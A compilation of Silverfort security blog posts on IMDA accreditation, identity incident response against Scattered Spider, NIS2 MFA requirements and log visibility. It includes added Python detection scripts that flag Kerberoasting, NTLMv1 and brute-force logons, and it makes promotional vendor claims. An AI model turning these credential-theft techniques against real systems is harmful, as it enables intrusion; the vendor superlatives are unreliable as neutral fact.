The Infocomm Media Development Authority, or IMDA, is a Singaporean government agency responsible for driving the nation's digital transformation and fostering a vibrant digital economy. The IMDA Accreditation programme (launched in 2014) plays a key role in accelerating the growth of Singapore-based enterprise tech product companies. The programme helps growth-stage Singapore-based tech companies succeed by strengthening their credibility through robust technical, financial, and operational evaluation, helping them win contracts with government agencies and large enterprises, and facilitating new growth capital into the companies.

Achieving accreditation from IMDA speaks volumes about the quality and security of our identity protection solution. This recognition demonstrates that our technology aligns with Singapore's high standards for digital services and solutions, which are crucial in safeguarding both individuals and businesses in an increasingly digital world. The IMDA accreditation of Silverfort also brings several benefits:

**Credibility and Trust**

IMDA's stamp of approval establishes trust and credibility with potential clients and partners in Singapore. It assures them that Silverfort complies with the stringent standards set by the Singaporean government. Accreditation from IMDA opens the door to new opportunities and partnerships in the Singaporean market.
As a result, we are able to collaborate with local businesses and government agencies, expanding our footprint and reaching a wider audience.

**Regulatory Compliance**

Being IMDA-accredited ensures that our solution complies with the relevant regulations and standards in Singapore.

### Silverfort's Key Capabilities Led to Gaining IMDA Accreditation

Silverfort's journey to IMDA accreditation reflects our commitment to empowering organizations with more advanced identity protection. With our distinctive product capabilities, we have consistently distinguished ourselves in the identity protection landscape, making us a prime candidate for this prestigious recognition. Let's explore how Silverfort's key capabilities played a pivotal role in achieving IMDA accreditation.

### Extend MFA to All On-Prem and Cloud Resources

Silverfort can apply Multi-Factor Authentication (MFA) protection to any resource and access interface across on-prem and multi-cloud environments, including assets that could never have been protected before. Silverfort natively integrates with all IAM solutions within the hybrid environment to provide real-time monitoring and risk analysis for every user authentication and access request, including ones made by external vendors. Silverfort determines whether to allow, block, or require MFA; if MFA is required, Silverfort notifies the MFA solution to push an MFA notification to the user. Based on the user's response, Silverfort instructs the identity provider on whether the access request can be granted.

### Securing Service Accounts

Silverfort provides comprehensive service account protection. It can automatically discover and secure all service accounts in an environment, continuously monitor their activity, and provide real-time insights into their risk level. Silverfort provides tailored access policies for each service account, and any deviation from the expected behavior can result in blocked access or an alert to the security team.
This ensures that service accounts are fully protected without the need to rotate passwords, which can disrupt critical processes.

### Lateral Movement and Ransomware Protection

Silverfort empowers organizations to prevent lateral movement attacks that use compromised credentials. Because Silverfort integrates with the identity provider's back end (rather than via agents or proxies on individual resources), it can detect suspicious activity across a network immediately and prevent it by triggering MFA. This includes the capability to enforce MFA on resources that were never designed to support it. As a result, organizations are able to respond to lateral movement in real time and stop ransomware threat actors in their tracks.

### Moving Forward with IMDA Accreditation

Silverfort's accreditation by IMDA is a testament to our commitment to providing complete identity protection to our customers, as well as a gateway to new opportunities in the Singaporean market. It not only underscores our past achievements but also serves as a catalyst for future growth and innovation in the ever-evolving field of cybersecurity. As we continue to grow in the Singaporean market, we look forward to contributing to the national digital transformation, enhancing security, and providing robust identity protection to all businesses. Thanks to IMDA accreditation, Silverfort is ready to accelerate its business in Singapore, and we are looking forward to the journey ahead.

---

- Published: 2023-11-23
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/the-identity-ir-playbook-against-scattered-spider-attacks/

The Scattered Spider adversary group has been extremely active in the past month, increasing its outreach to financial and insurance entities. The group makes extensive and in-depth use of identity compromise in both the initial access and lateral movement stages.
A sound defensive strategy against Scattered Spider should include a full-lifecycle protection layer that reduces and monitors the identity attack surface and that detects, blocks, and responds to the use of compromised identities for malicious access. Silverfort's threat research team has interacted closely with the identity threats used by Scattered Spider. This article presents the identity IR framework that was implemented, shedding light on the critical components that must be addressed to ensure the identity aspects of a Scattered Spider attack are handled efficiently.

### What's Different in the Identity Aspect of Incident Response?

Where the malware aspect of IR focuses on detecting and removing malicious files, and network IR is about detecting and blocking malicious traffic, the identity aspect of IR is about detecting and blocking lateral movement carried out by compromised user accounts.

Let's assume there's a live incident going on. You know the adversaries have established a foothold in your network and are accessing resources within it. Now you need to identify the compromised user accounts, stop the attackers from using them, and ensure other resources are not compromised, as rapidly as possible. To do that efficiently you need full visibility, analysis, and access control capabilities for authentications and access attempts that involve the following entities:

- User accounts, including service accounts, domain admins, and regular users.
- Identity infrastructure, including domain controllers, federation servers, SaaS identity providers, PAM solutions, and any other component that manages identities in your environment.
- Domain-joined machines, including IT and security infrastructure, workstations, and servers.

Silverfort is the first solution that provides IT teams with these capabilities in a single, easily deployed solution. Let's understand how this maps to the NIST IR lifecycle that most IR teams use as a standard guideline.
### Mapping Identity Protection to the NIST IR Lifecycle Model

The NIST IR framework divides the IR process into four parts: 1) preparation, 2) detection and analysis, 3) containment, eradication, and recovery, and 4) post-incident activity. In this example we assume the Silverfort platform is only called in once an incident is fully active and wasn't installed before, so we focus on stages (2) and (3) only.

### Identity IR: Detection and Analysis

This stage focuses on identifying the compromised user accounts, identity infrastructure, and any other resource that has been accessed with the compromised entities. For this stage, Silverfort provides IR teams with a detailed Log Screen that offers an aggregated view of all authentications and access attempts made by all users to any cloud or on-prem resource. Every authentication is assigned a risk score by Silverfort's risk engine, and a wide range of filters makes it easy to find authentications that were initiated by malicious actors. Using these capabilities, the IR team can:

- Analyze the unified logs of AD and other on-prem, federation, and cloud directories to spot lateral movement attempts between the cloud and on-prem environments.
- Analyze the logs of hybrid service accounts (those used both for machine-to-machine communication and for manual logins by human users) to detect anomalous activity or access attempts that Silverfort's risk engine flags as malicious.
- Analyze the logs of infrastructure-related service accounts to detect anomalous activity or access attempts that Silverfort's risk engine flags as malicious (again, because of Scattered Spider's inclination towards infrastructure compromise).

Silverfort's integration with all identity providers in the environment means you can see all authentication logs for any user accessing any on-prem or cloud resource through a single pane of glass.
### Identity IR: Containment, Eradication and Recovery

This stage comprises the bulk of the IR process and, as the name implies, is about blocking the attackers from advancing further, eliminating their presence, and restoring things to how they were. Silverfort assists IR teams mainly with the containment and eradication parts of this stage by providing the following tools:

- A policy configuration screen where MFA and Block Access policies can be configured for any user account in the hybrid environment. This applies to any authentication type, including command-line access over PsExec, PowerShell, or WMI, which adversaries typically use.
- A dedicated screen for service account protection that provides automated visibility into all service accounts and enables the creation of access policies that block access or alert when an account deviates from its standard behavior, which is a clear indication of compromise.

Using these capabilities, IR teams can apply the following actions for the entity types listed above:

**Service Accounts**

- Discover all service accounts within the environment.
- Activate policies to block service accounts from accessing resources if they deviate from their standard behavior.
- Detect Kerberoasting attacks or interactive logins by service accounts.
- Configure policies to block access from VPN subnets.

**Domain Admin Accounts**

- Configure MFA policies for all admins and harden these policies by requiring FIDO tokens and number matching.
- Configure policies to deny access for built-in administrator and guest accounts.
- Configure policies to block access from VPN subnets.

**All User Accounts**

- Use MFA or access block policies to temporarily restrict access attempts that use services such as termsrv, host, and CIFS to perform remote connections.

**Domain Controllers**

- Reset the KRBTGT account's password to mitigate a potential Golden Ticket attack and eliminate the adversary's foothold.
- Configure an MFA policy for Windows logon to the DC to prevent remote logon.
- Configure a policy to deny NTLM connections to the DC.
- Configure a policy to block DC access for all users except domain admins.
- Configure an MFA policy to deny access for users without a registered MFA token, to prevent future malicious access via social engineering.

**Federation/SaaS Identity Providers**

- Configure MFA or block access policies for known malicious and unknown IPs.

**IT and Security Infrastructure**

- Configure an MFA policy to deny access for users without a registered MFA token.

**Other Domain-Joined Machines**

- Discover existing NTLMv1 authentications and configure a policy to deny them.
- Temporarily block all NTLMv2 authentications until compromised user accounts have been detected and contained.
- Configure a policy to restrict personal workstation access to critical resources (such as DCs) only, and prevent connections between machines.
- Configure a policy to require MFA for all access to any machine that is open to the Internet.

Important: these containment activities are also detection activities, as any blocked authentication indicates that the initiating user account is compromised.

### Silverfort for Identity Threats: Post-Incident Activity and Preparation – Achieve Defense in Depth

A sound defense against Scattered Spider should address all of its parts, from the social engineering aspect to the unique malware this group employs (a Bring Your Own Vulnerable Driver (BYOVD) attack via CVE-2015-2291, an old kernel vulnerability). Mobile and browser security solutions typically address the former, while EDR addresses the latter. However, it is imperative that the environment's security architecture is fully equipped to confront identity infrastructure compromise and to detect and block malicious access with compromised accounts. It's easy to see that most of the containment activities described above are also part of the preparation phase.
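As an added example (not Silverfort's code), the following Python script applies several of the checks in the containment checklist above to Windows Security events: it learns a per-service-account baseline from earlier logons, then flags NTLMv1 logons, interactive logons by service accounts, RC4-encrypted TGS requests for a service account's SPN (a Kerberoasting indicator), and service-account logons that deviate from the baseline; the same baseline-deviation check is what the MAS post's "Activity Monitoring" step describes. Event field names are those of the Windows Security log (events 4624 and 4769); the accounts, hosts, addresses and the events themselves are constructed.

```python
"""Identity IR triage over Windows Security events (added example, not Silverfort code).

Flags the indicators named in the IR checklist: NTLMv1 logons, interactive
logons by service accounts, RC4-encrypted TGS requests for service-account
SPNs (a Kerberoasting indicator) and service-account logons that deviate from
a learned (source IP, destination host) baseline. Field names follow the
Windows Security log (events 4624 and 4769); accounts, hosts, addresses and
the events themselves are constructed.
"""
from collections import defaultdict

SERVICE_ACCOUNTS = {"svc_backup", "svc_sql"}   # assumed inventory from discovery
INTERACTIVE_LOGON_TYPES = {2, 10, 11}          # console, RemoteInteractive (RDP), cached
RC4_HMAC = "0x17"                              # TicketEncryptionType value for RC4-HMAC


def logon(user, ip, host, logon_type, pkg="Kerberos", lm="-"):
    """Build a constructed event 4624 (successful logon) record."""
    return {"EventID": 4624, "TargetUserName": user, "IpAddress": ip, "Computer": host,
            "LogonType": logon_type, "AuthenticationPackageName": pkg, "LmPackageName": lm}


def tgs_request(user, ip, service, enc_type):
    """Build a constructed event 4769 (Kerberos service ticket request) record."""
    return {"EventID": 4769, "TargetUserName": user, "IpAddress": ip,
            "ServiceName": service, "TicketEncryptionType": enc_type}


# Constructed history from before the incident: what "normal" looks like.
BASELINE_EVENTS = [
    logon("svc_backup", "10.0.1.5", "FS01", 3),
    logon("svc_backup", "10.0.1.5", "FS02", 3),
    logon("svc_sql", "10.0.1.7", "SQL01", 5),
]

# Constructed events from the live incident.
INCIDENT_EVENTS = [
    logon("svc_backup", "10.0.9.23", "DC01", 10, pkg="NTLM", lm="NTLM V2"),  # RDP by a service account
    logon("jdoe", "10.0.9.23", "FS01", 3, pkg="NTLM", lm="NTLM V1"),          # NTLMv1 still in use
    tgs_request("jdoe@CORP.LOCAL", "10.0.9.23", "svc_sql", RC4_HMAC),         # RC4 TGS for an SPN
    logon("svc_sql", "10.0.1.7", "SQL01", 5),                                  # normal, must not fire
]


def build_baseline(events, service_accounts):
    """Learn each service account's normal (source IP, destination host) pairs."""
    baseline = defaultdict(set)
    for e in events:
        if e["EventID"] == 4624 and e["TargetUserName"] in service_accounts:
            baseline[e["TargetUserName"]].add((e["IpAddress"], e["Computer"]))
    return baseline


def triage(events, service_accounts, baseline):
    """Return (indicator, account, detail) tuples for events worth containing."""
    findings = []
    for e in events:
        user = e["TargetUserName"].split("@")[0]  # 4769 carries user@REALM
        ip = e["IpAddress"]
        if e["EventID"] == 4624:
            host = e["Computer"]
            if e["AuthenticationPackageName"] == "NTLM" and e["LmPackageName"] == "NTLM V1":
                findings.append(("ntlmv1_logon", user, f"{ip} -> {host}"))
            if user in service_accounts:
                if e["LogonType"] in INTERACTIVE_LOGON_TYPES:
                    findings.append(("service_account_interactive_logon", user,
                                     f"logon type {e['LogonType']} on {host}"))
                if (ip, host) not in baseline.get(user, set()):
                    findings.append(("service_account_baseline_deviation", user,
                                     f"{ip} -> {host} not in baseline"))
        elif e["EventID"] == 4769:
            spn_owner = e["ServiceName"]
            # An RC4 (0x17) ticket requested for a service account's SPN is the
            # classic Kerberoasting signature; the requester is the suspect.
            if e["TicketEncryptionType"] == RC4_HMAC and spn_owner in service_accounts:
                findings.append(("rc4_tgs_request_kerberoasting", user,
                                 f"ticket for {spn_owner} requested from {ip}"))
    return findings


def containment_candidates(findings):
    """Accounts to put under block/MFA policy first (and, for service accounts,
    to review for a credential reset): each finding points at an abused account."""
    return sorted({account for _, account, _ in findings})


if __name__ == "__main__":
    base = build_baseline(BASELINE_EVENTS, SERVICE_ACCOUNTS)
    hits = triage(INCIDENT_EVENTS, SERVICE_ACCOUNTS, base)
    for hit in hits:
        print(hit)
    print("contain first:", containment_candidates(hits))
```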
In addition to the policy configuration capabilities, Silverfort also enables IR teams to proactively prepare their environment for an identity threat, whether initiated by Scattered Spider or any other threat actor. For this, Silverfort provides IR teams with an Insights screen that aggregates all identity security weaknesses and exposures, such as shadow admins, NTLMv1, unconstrained delegation, and many others that threat actors typically abuse. Using this screen, the IR team can systematically harden the security posture of its environment.

### Conclusion: Identity Threat IR Tools and Practices Are a Must

Identity threats are becoming an integral part of adversaries' arsenals. While Scattered Spider is a leader in that aspect, it is by no means the only one. As a result, IR teams must have the tools to conduct a rapid and efficient identity IR process. In the same way that an EDR is the ultimate tool to address the malware aspect, a corresponding tool is required to pinpoint the compromised identities, contain the attack, and eliminate malicious presence.

Want to learn more about Silverfort's identity IR capabilities? Schedule a call with one of our experts.

---

- Published: 2023-11-02
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/comply-with-nis2-directive-mfa-requirements-with-silverfort/

In Article 21, the NIS2 Directive defines the minimum set of security measures regulated entities must implement to comply with its requirements. Section 2(j) relates directly to Multi-Factor Authentication (MFA), stating that the security measures should include: 'The use of multi-factor authentication or continuous authentication solutions, secured voice, video and text communications and secured emergency communication systems within the entity, where appropriate.' The interpretation of 'where appropriate' is wherever there is a likelihood that the lack of MFA protection could result in a cyber breach.
In other words, entities should demonstrate that a) they have thoroughly assessed their identity attack surface to identify where malicious access by a threat actor is a critical threat, and b) they have mitigated this risk by enforcing MFA on these potential access attempts.

### Breakdown of NIS2 MFA Requirements

We can map the access points that need protection along the following three aspects:

- User accounts – which users are adversaries likely to target?
- Access methods – how do adversaries gain malicious access?
- Organizational resources – which resources are adversaries likely to target?

These are the questions that you, as an identity security stakeholder, must first answer to determine where MFA protection is needed. To best answer them, we'll adopt the attacker's point of view, based on the numerous attacks we've analyzed, investigated, and prevented. So, which users, access methods, and resources should you protect with MFA? Let's examine them one by one.

### MFA for Privileged Users Whose Compromise Bears the Highest Impact

The compromise of privileged users is a prime goal for adversaries. These user accounts are entitled to access, execute code, and interact with data on multiple resources within the environment. In a typical environment these users are your admins, helpdesk, and IT teams, so placing MFA protection on these users is of paramount importance.

### MFA for PsExec and Remote PowerShell Access Used by Attackers for Lateral Movement and Ransomware Spread

Adversaries can use compromised credentials to perform lateral movement, scaling their initial access and spreading within the targeted environment. This spread is the key component behind mass ransomware and data theft attacks. Their tools of choice are command-line access tools such as PsExec and Remote PowerShell. Enforcing MFA on users accessing resources via these tools is the ultimate protection against these attacks.
### MFA for All Applications and Servers That Are Critical to Your Organization's Operations

Adversaries target critical resources to maximize the return on their investment, whether through a ransomware attack that locks down mission-critical applications or through the theft of sensitive business data or intellectual property. Identifying these resources and placing MFA protection on users' access to them is thus a top priority.

### Silverfort Unified Identity Protection Agentless MFA

Silverfort is the provider of the first Unified Identity Protection platform, delivering real-time protection against identity threats that use compromised credentials for malicious access. Silverfort's unique integration with Active Directory enables it to extend MFA to any authentication within the AD environment, across any user, authentication protocol, and resource.

### Native Integration with Active Directory Provides 100% MFA Coverage

How is it done?

1. AD forwards every incoming access request to Silverfort.
2. Silverfort analyzes the access request against the access policies in place, as well as against known attack patterns or anomalies that could indicate a potential compromise.
3. Silverfort's analysis determines whether to allow access, block it, or verify the user's identity with MFA.
4. If verification is needed, Silverfort contacts either its own or any third-party MFA service to verify that the actual user initiated the access request.
5. Following the user's response, Silverfort tells AD whether access is allowed.

This architecture ensures full coverage of all authentications and access attempts within the protected environment.

### Silverfort Protection for NIS2 MFA Requirements: Critical User Accounts, Resources, and Access Methods

Silverfort's comprehensive MFA protection enables organizations to implement the NIS2 MFA requirements.
Let's examine that in more detail.

### Silverfort's MFA for Privileged Users

Silverfort automates the discovery of all users that belong to an administrative group and enables the configuration and enforcement of an MFA policy on these users in a single click. Moreover, Silverfort also discovers users that have been inadvertently assigned admin privileges (aka 'Shadow Admins') and configures policies that include these users in the MFA protection. In that manner, any adversarial attempt to use the compromised credentials of these users for malicious access will be blocked.

### Silverfort's MFA for Command Line Access

As explained earlier, Silverfort's integration with AD enables it to extend MFA to all AD authentications. Until now, command-line tools like PsExec and PowerShell were beyond the scope of traditional MFA solutions, because their underlying legacy authentication protocols, NTLM and Kerberos, don't support integrating MFA into their authentication process. Silverfort's architecture sidesteps the protocol support issue because it can analyze and gain insight into any authentication packet forwarded by AD. This makes Silverfort the only solution that can protect PsExec and PowerShell with MFA, effectively mitigating the risk of ransomware spread in the environment.

### Silverfort's MFA for Legacy Applications

Many organizations, especially in verticals subject to specific cyber security standards such as the NIS2 directive, still rely on legacy applications for their core operations. Traditional MFA solutions are not a good fit here because incorporating MFA into these apps requires changes to the app's source code – an operational risk most organizations are reluctant to take. Again, however, Silverfort's integration with AD enables it to seamlessly enforce MFA protection on any app that authenticates to AD, ensuring the organization's critical resources have real-time protection against malicious access.
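As an added illustration (not Silverfort's implementation) of the AD-forwarding decision flow and the three NIS2 aspects described above, here is a small Python policy evaluator: it receives an access request as AD would forward it, returns allow, block or MFA based on privileged group membership, command-line access method and critical resource, denies users without a registered token rather than failing open, and consults a verifier callback in place of the MFA service before answering AD. The group names, hosts, SPN service classes and enrolment list are constructed assumptions.

```python
"""NIS2-style MFA policy decision modelled on the AD-forwarding flow
(added example, not Silverfort code).

Given an access request as AD would forward it, decide ALLOW, BLOCK or MFA
from the three aspects in the text (privileged users, command-line access
methods, critical resources), and for MFA consult a verifier before answering
AD. Group names, hosts, SPN service classes and the enrolment list are
constructed assumptions.
"""
from dataclasses import dataclass
from enum import Enum
from typing import Callable


class Verdict(Enum):
    ALLOW = "allow"
    BLOCK = "block"
    MFA = "mfa"


@dataclass(frozen=True)
class AccessRequest:
    user: str
    groups: frozenset     # AD group memberships of the user
    target: str           # resource (host) being accessed
    service: str          # SPN service class of the request, e.g. "cifs", "http"
    protocol: str         # "Kerberos", "NTLMv2" or "NTLMv1"


@dataclass(frozen=True)
class Policy:
    # Assumption: admins, helpdesk and IT, the privileged groups the text names.
    privileged_groups: frozenset = frozenset({"Domain Admins", "Helpdesk", "IT Ops"})
    # Assumption: service classes behind PsExec (cifs), remote PowerShell/WinRM (http),
    # WMI (host) and RDP (termsrv), the remote-access paths the text names.
    command_line_services: frozenset = frozenset({"cifs", "http", "host", "termsrv"})
    critical_resources: frozenset = frozenset({"DC01", "ERP01", "SQL01"})
    mfa_enrolled: frozenset = frozenset({"alice", "bob"})


def evaluate(req: AccessRequest, pol: Policy) -> Verdict:
    """Steps 2-3 of the flow: match the request against policy, no MFA push yet."""
    if req.protocol == "NTLMv1":
        return Verdict.BLOCK  # legacy protocol denied outright
    needs_mfa = (
        bool(req.groups & pol.privileged_groups)             # privileged user
        or req.service.lower() in pol.command_line_services  # lateral-movement access method
        or req.target in pol.critical_resources              # critical resource
    )
    if not needs_mfa:
        return Verdict.ALLOW
    if req.user not in pol.mfa_enrolled:
        return Verdict.BLOCK  # no registered token: deny rather than fail open
    return Verdict.MFA


def decide_for_ad(req: AccessRequest, pol: Policy, verify: Callable[[str], bool]) -> bool:
    """Steps 2-5: evaluate, push MFA through `verify` when required, and
    return the grant (True) / deny (False) answer handed back to AD."""
    verdict = evaluate(req, pol)
    if verdict is Verdict.BLOCK:
        return False
    if verdict is Verdict.MFA:
        return verify(req.user)  # the verifier stands in for the MFA service callback
    return True


if __name__ == "__main__":
    pol = Policy()
    psexec = AccessRequest("bob", frozenset(), "FS02", "cifs", "Kerberos")
    print(evaluate(psexec, pol))                          # Verdict.MFA
    print(decide_for_ad(psexec, pol, lambda user: True))  # True: user approved the prompt
    print(decide_for_ad(psexec, pol, lambda user: False)) # False: denied or timed out
```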
Want to learn more about how Silverfort can assist you in complying with NIS2 MFA requirements? Schedule a call with one of our experts or fill in this form for a pricing quote.

---

- Published: 2023-10-24
- Modified: 2025-07-21
- URL: https://www.silverfort.com/blog/how-silverfort-empowers-you-to-detect-and-resolve-identity-risks-with-zero-effort/

When it comes to protecting organizations from compromise, what does visibility mean? It’s a word often used in the security industry – yet it is rarely fully defined. In the context of identity protection, visibility is the ability to view and manage all data and security risks associated with a user account – and to gain actionable insights from that information. This matters because, without full visibility into elements such as user and authentication activity, access permissions, risky identities, authorized applications, and so on, you could be leaving critical identity security gaps open without even knowing it.

In this post, we’ll highlight the different challenges organizations experience when they don’t have full visibility into their users’ activity and authentication requests. Afterwards, we’ll show how Silverfort empowers customers to gain complete visibility across their environments, enabling real-time detection and actionable insights into resolving identity risks with almost zero effort.

## Managing Users Comes with a Lack of Context & Visibility

In most cases, a typical user is associated with several different identities across cloud or on-prem services in their organization’s hybrid environment. Further, most user directories lack the tools to report on the data and risks associated with a particular identity. The vast amount of user data residing in systems like Active Directory or an organization’s SIEM can make it daunting to track, manage, and monitor user identities, access permissions, and activities effectively. Unfortunately, very few solutions can aggregate all inventory and identity data.
This results in fragmented and incomplete information about who has access to what resources and how they are using them. As a result, even if security admins are aware of some or all of the identities and activities associated with a user, they might not have a clear understanding of what permissions have been assigned, inherited, or shared. This is a serious identity protection challenge. Due to this lack of visibility, identity-related risks such as unauthorized access or misuse of privileges may arise. Without complete visibility into your users and their access capabilities, it becomes increasingly difficult to protect sensitive data and critical assets. This is why it is imperative to recognize that security truly starts with visibility.

## Silverfort Provides Complete Visibility into All Users

Silverfort automatically discovers and protects all user accounts in a hybrid environment from identity-based threats and provides centralized visibility into every authentication and access request. As a result of Silverfort’s native integrations with all identity providers, including Active Directory, it can log every authentication request. This provides a unified view of all network activity across every user and any resource in the hybrid environment. With complete visibility across all user activity, Silverfort’s risk engine can determine the legitimacy of every authentication, so organizations can detect and respond to potential security threats in real-time — including blocking the access of any accounts that display anomalous behavior.

This is just a glimpse into how Silverfort’s visibility capabilities can help you strengthen your identity security posture management. Now, let’s look at how you can gain visibility into all the users in the Silverfort console.

## Visibility of User Activity & Authentication

### Full User Context

The Silverfort Logs screen provides full visibility into all user logs, authentication activity, and risk indicators.
The moment Silverfort is integrated with your IdP, all user accounts are detected, allowing you to monitor their activity and associated risks. As each user is detected, their details are displayed, including username, the risk level assigned by Silverfort, authentication type, Silverfort’s action, and the IdP result.

Screenshot #1: Silverfort’s authentication logs screen

### Filtering by Risk Indicators

In the Logs screen, users can filter their logs according to account type or risk indicator. This allows them to view their users by the different risk indicators that have been detected and assigned by Silverfort’s risk engine. Silverfort supports many different user risk indicators, such as NTLMv1, Kerberoasting, brute force, MFA bombing, abnormal MFA activity, failed authentications, and many more. By filtering by risk indicator, you gain complete visibility and insights into your risky users, and you can then remediate the different risks each user presents. Here are two prominent risk indicators that many of our customers tend to filter by within their Silverfort console Logs screen:

### NTLMv1

What is it? NTLMv1 is the legacy predecessor of NTLMv2, the version of the NTLM protocol used today in Active Directory environments.

What makes it risky? NTLMv1 uses relatively weak encryption algorithms, which can be easily cracked by attackers that intercept its authentication traffic. This leaves environments that use NTLMv1 critically exposed to compromise.

Screenshot #2: Discovering all users using NTLMv1

How can Silverfort users apply this feature? Silverfort discovers all NTLMv1 authentications within an environment. Silverfort’s risk engine detects NTLMv1 authentications and flags them as a risk indicator, which can be used as a filter to uncover machines that perform such authentications and also as an access policy trigger. Within the Authentication Logs screen, check the NTLMv1 Authentication box.
Once checked, all matching authentications are displayed with all the standard authentication fields (source, destination, etc.), which can be narrowed further with additional filters.

Screenshot #3: Filtering for NTLMv1 authentication in the logs screen

As well as providing visibility into when NTLMv1 authentications are being used, Silverfort can also protect you and your organization by preventing the use of NTLMv1. Our blog post Silverfort Enables Organizations to Resolve the Risks of NTLMv1 details how you can protect against the use of NTLMv1 authentications.

### Shadow Admins

What is it? Shadow admins are user accounts that either possess admin access or are capable of obtaining it, despite not being members of a documented admin group. IT teams are typically unaware of these accounts, as there is no documentation of the excessive privileges they possess.

What makes them risky? Since these accounts are not regarded as admin accounts by the IT team, they are not subject to common admin account security controls (PAM, MFA, etc.). This makes these accounts a lucrative target for adversaries, who can easily compromise them and abuse their privileges for malicious access.

How can I detect shadow admins with Silverfort? In Silverfort’s Authentication Logs screen, add the Risk Indicator filter and check Shadow Admins. Click Apply and adjust the time range to suit your monitoring schedule. This will display all shadow admins that have been added to the environment during this period.

Screenshot #4: Filtering for shadow admins in the logs screen

Upon discovering an account, you can click the investigation icon to see exactly which resources it has attempted to access since it was created. You can then decide whether to remove the account entirely or remove its redundant permissions.
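To make two things on this page concrete, the inline decision flow described in the NIS2 MFA section (the IdP forwards each request, risk indicators are attached, and the request is allowed, blocked or stepped up to MFA) and the risk-indicator filtering described in this section, here is an added Python example written for this page. It is not Silverfort’s code, log format, risk engine or thresholds. It parses constructed key=value log lines, tags NTLMv1 use, a brute-force burst (five failures from one source within 60 seconds, a threshold chosen for the example) and accounts from a supplied shadow-admin list, supports filtering by indicator, and makes the allow/block/MFA decision with a stand-in `verify_mfa` callback in place of the MFA service.

```python
"""Parse constructed authentication log lines, attach risk indicators the
way a risk engine might (NTLMv1 use, brute force, shadow-admin account),
filter by indicator, and run each request through the allow / block / MFA
decision with a pluggable MFA verifier.

Added example for this article, not Silverfort's code, log format or
thresholds; the log lines, field names and policy below are constructed."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOG_RE = re.compile(r"(\w+)=(\S+)")
BRUTE_FORCE_FAILURES = 5                    # failures per (user, source) ...
BRUTE_FORCE_WINDOW = timedelta(seconds=60)  # ... inside this window

# Constructed log: one line per authentication forwarded by the IdP.
SAMPLE_LOG = """\
ts=2023-10-20T09:00:01Z user=alice src=WS01 dst=DC01 proto=Kerberos result=success
ts=2023-10-20T09:00:05Z user=svc_backup src=SRV07 dst=FS01 proto=NTLMv1 result=success
ts=2023-10-20T09:01:00Z user=carol src=WS15 dst=FS01 proto=Kerberos result=success
ts=2023-10-20T09:02:00Z user=dave src=WS22 dst=DC01 proto=NTLMv2 result=failure
ts=2023-10-20T09:02:05Z user=dave src=WS22 dst=DC01 proto=NTLMv2 result=failure
ts=2023-10-20T09:02:10Z user=dave src=WS22 dst=DC01 proto=NTLMv2 result=failure
ts=2023-10-20T09:02:15Z user=dave src=WS22 dst=DC01 proto=NTLMv2 result=failure
ts=2023-10-20T09:02:20Z user=dave src=WS22 dst=DC01 proto=NTLMv2 result=failure
ts=2023-10-20T09:02:30Z user=dave src=WS22 dst=DC01 proto=NTLMv2 result=success
"""

# Constructed policy: which indicators block outright, which trigger MFA,
# and which accounts (documented admins) always get MFA.
POLICY = {
    "block_on": {"BruteForce"},
    "mfa_on": {"NTLMv1", "ShadowAdmin"},
    "mfa_users": {"alice"},
}
SHADOW_ADMINS = {"carol"}   # e.g. the output of a shadow-admin discovery run


def parse_line(line):
    rec = dict(LOG_RE.findall(line))
    rec["ts"] = datetime.fromisoformat(rec["ts"].replace("Z", "+00:00"))
    return rec


def load_log(text):
    return [parse_line(l) for l in text.splitlines() if l.strip()]


def tag_risk_indicators(records, shadow_admins):
    """Return the records in time order, each with a 'risk' set attached."""
    failures = defaultdict(deque)   # (user, src) -> recent failure timestamps
    tagged = []
    for rec in sorted(records, key=lambda r: r["ts"]):
        risk = set()
        if rec["proto"] == "NTLMv1":
            risk.add("NTLMv1")
        if rec["user"] in shadow_admins:
            risk.add("ShadowAdmin")
        window = failures[(rec["user"], rec["src"])]
        while window and rec["ts"] - window[0] > BRUTE_FORCE_WINDOW:
            window.popleft()
        if rec["result"] == "failure":
            window.append(rec["ts"])
        # Flag the request that completes the burst and any success that
        # follows inside the window (a likely guessed password).
        if len(window) >= BRUTE_FORCE_FAILURES:
            risk.add("BruteForce")
        tagged.append({**rec, "risk": risk})
    return tagged


def filter_by_indicator(tagged, indicator):
    return [r for r in tagged if indicator in r["risk"]]


def decide(rec, policy, verify_mfa):
    """One inline decision: BLOCK on attack patterns, step up to MFA for
    risky or privileged requests, otherwise ALLOW. verify_mfa(user) stands
    for the call to the MFA service and returns True only if the real user
    approved. The result is what gets reported back to the IdP."""
    if rec["risk"] & policy["block_on"]:
        return "BLOCK"
    if rec["risk"] & policy["mfa_on"] or rec["user"] in policy["mfa_users"]:
        return "ALLOW" if verify_mfa(rec["user"]) else "BLOCK"
    return "ALLOW"


def run(log_text, policy, shadow_admins, verify_mfa):
    tagged = tag_risk_indicators(load_log(log_text), shadow_admins)
    return [(r["user"], sorted(r["risk"]), decide(r, policy, verify_mfa)) for r in tagged]


if __name__ == "__main__":
    # Constructed MFA service: everyone approves except the service account,
    # which has nobody to answer a prompt.
    for user, risk, verdict in run(SAMPLE_LOG, POLICY, SHADOW_ADMINS, lambda u: u != "svc_backup"):
        print(f"{user:<10} risk={risk or '-'} -> {verdict}")
```

The four failed attempts before the burst completes come back as ALLOW: the engine has no reason to intervene yet, and the IdP rejects the wrong password on its own. The fifth failure and the success that follows it are blocked, and that success is the record an analyst would filter for, since a correct password immediately after a burst of failures is the signature of a guessed credential.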
## Identity Security Posture Management

Organizations can view the identity inventory of their environment in the Insights screen of the Silverfort console, including users, resources, risky users, and more.

Screenshot #5: Silverfort’s Insights screen

This screen displays the types of users and resources in your environment as well as the weaknesses in your security that adversaries may abuse to launch identity threats. Among these are shadow admins, admin users with SPNs, accounts with passwords that do not expire, and many more. This screen enables you to gather actionable insights on your environment’s security posture and take action to resolve these weaknesses, making it significantly harder for threat actors to attack your business.

## Real-Time Visibility is the Foundation of Identity Protection

Complete visibility into resources and users across hybrid environments is becoming a top priority for organizations looking to adopt a proactive approach to identity protection. The good news is that with Silverfort, they can gain comprehensive visibility into their entire identity attack surface in an effortless, fully automated manner. This is the first step towards hardening your environment against identity threats and reducing the likelihood of a successful attack.

Looking to gain complete visibility across your environment? Reach out to one of our experts here.

---

- Published: 2023-10-01
- Modified: 2025-03-11
- URL: https://www.silverfort.com/blog/best-iam-tools/

